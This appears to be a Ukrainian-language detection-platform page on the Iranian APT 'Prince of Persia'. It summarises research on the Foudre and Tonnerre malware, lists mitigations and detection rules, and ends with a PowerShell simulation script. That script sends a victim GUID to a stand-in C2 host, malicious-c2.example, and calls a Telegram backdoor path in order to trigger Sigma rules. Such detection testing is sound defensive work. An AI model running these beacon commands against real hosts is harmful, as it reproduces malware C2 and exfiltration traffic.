Принц Персії: 10-річний ретроспективний погляд на активність APT в Ірані
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Звіт описує пов’язане з Іраном угрупування APT під назвою Prince of Persia і простежує його прогрес протягом останнього десятиліття, з акцентом на діяльності, спостережуваній з 2023 по 2025 рік. Оператори покладаються на індивідуальні сімейства шкідливого програмного забезпечення, включаючи Foudre, Tonnerre, MaxPinner, Rugissement і Deep Freeze, для підтримки шпигунства та систематичного викрадення даних. Останні версії впроваджують алгоритми генерації доменів, управління та командування на базі Telegram і зашифровані SFX-навантаження для покращення стійкості та приховування. Мішенями є критична інфраструктура та мережі, пов’язані з дисидентами, в різних регіонах.
Дослідження
Дослідники SafeBreach стежили за операціями групи з 2019 року, збираючи нові зразки, документуючи архітектуру C2 та аналізуючи логику DGA. Вони розшифрували захищені навантаження, витягли облікові дані бота Telegram та побудували часову шкалу варіантів розгортання. Дослідження висвітлює окремі виробничі та тестові інфраструктури і деталі поведінки, пов’язаної з зараженням через Excel. Індикатори компрометації були зібрані з хешів шкідливого програмного забезпечення, доменів та URL-адрес.
Пом’якшення
Моніторьте активність DNS на предмет виявлених моделей DGA, блокуйте відомі шкідливі домени та обмежуйте або перевіряйте трафік, пов’язаний з ботами Telegram. Додайте виявлення для зазначених імен файлів шкідливого програмного забезпечення та артефактів DLL-завантажувача, а також використовуйте моніторинг DNS/секвестрацію для висвітлення обертової інфраструктури. Забезпечте дозволи списків застосунків та укріпите безпеку Office, обмежуючи макроси, щоб зменшити ймовірність початкового доступу.
Відповідь
Якщо знайдено будь-який індикатор, ізолюйте уражену систему, зберіть мінливі докази та проведіть цільову розвідку на відкладених файлах та відповідних шляхах реєстру. Блокуйте всі пов’язані домени та IP-адреси, оновіть токени бота Telegram та перевстановіть облікові дані для уражених облікових записів. Полюйте по всьому середовищу на залишки індивідуальних DLL-завантажувачів та зашифровані SFX-навантаження, щоб забезпечити повне викорінення.
Потік атаки
Детекції
Можливе зловживання Telegram як каналом команд та керування
Перегляд
Можливе проникнення/експільтрація даних/C2 через сторонні служби/інструменти (через проксі)
Перегляд
Підозріле управління командним і контрольним сервером незвичайним доменом верхнього рівня (TLD) DNS-запитом
Перегляд
Підозріле виконання Taskkill (через командний рядок)
Перегляд
ІОС (HashSha256) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом Частина 2
Перегляд
ІОС (SourceIP) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом
Перегляд
ІОС (HashSha256) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом Частина 1
Перегляд
ІОС (HashMd5) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом
Перегляд
ІОС (DestinationIP) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом
Перегляд
Виявлення зараження Foudre v34 через файл Excel з вбудованим виконуваним файлом [Створення процесу Windows]
Перегляд
Виявлення зв’язку C2 Foudre та Tonnerre [Мережеве з’єднання Windows]
Перегляд
Виконання моделювання
Попередня умова: перевірка телеметрії та базових показників повинна бути пройденою.
Причина: Цей розділ детально описує точне виконання техніки супротивника (T1584.005), призначеної для запуску правила виявлення. Команди та розповідь МАЮТЬ конкретно відображати ідентифіковані TTP та мають на меті згенерувати саме ту телеметрію, яку очікує логіка виявлення.
-
Розповідь про атаку та команди:
Актор загрози налаштував шкідливий доменmalicious-c2.example, який хостить сервер C2 Foudre/Tonnerre. Навантаження нападника на машині жертви виконує два запити HTTP GET:- Відправляє GUID жертви на кінцевий C2 Foudre, використовуючи шлях
/1/?c=<GUID>. - Зв’язується з API Telegram через задній хід Tonnerre, використовуючи шлях
/t/tga.adr.
Обидва запити виконуються через HTTP (для спрощення журналювання проксі) і містять загальний User-Agent для змішування із звичайним трафіком. Дії генерують точні поля (
request_method=GET,urlмістять цільові підрядки), які відстежують правила Sigma. - Відправляє GUID жертви на кінцевий C2 Foudre, використовуючи шлях
-
Скрипт тестування регресії:
# ------------------------------------------------------------ # Моделювання зв’язку C2 Foudre & Tonnerre (Windows) # ------------------------------------------------------------ # 1. Визначте GUID жертви (в реальній інфекції це буде зчитано з реєстру) $guid = (New-Guid).Guid # 2. Визначте шкідливий хост C2 (замініть на адресу, яку ви контролюєте для тестування) $c2Host = "http://malicious-c2.example" # 3. Відправити GUID на кінцевий C2 Foudre $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Відправка GUID на Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Зв’язатися з API Telegram через задній хід Tonnerre $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Зв’язок з кінцевою точкою API Telegram: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Моделювання завершено. Перевірте SIEM на наявність тривог."Скрипт автономний; його запуск на Windows хості, що маршрутизує трафік через налаштований проксі, створить два записи журналу, які відповідають умовам правила Sigma
url|containsумовам. -
Команди очищення:
# Видалити будь-які тимчасові мережеві з'єднання (актуально тільки якщо проксі створює постійні сесії) # Тут ми просто очищаємо кеш DNS, щоб уникнути залишкового розв’язання шкідливого хоста. ipconfig /flushdns Write-Host "[*] Очищення завершено."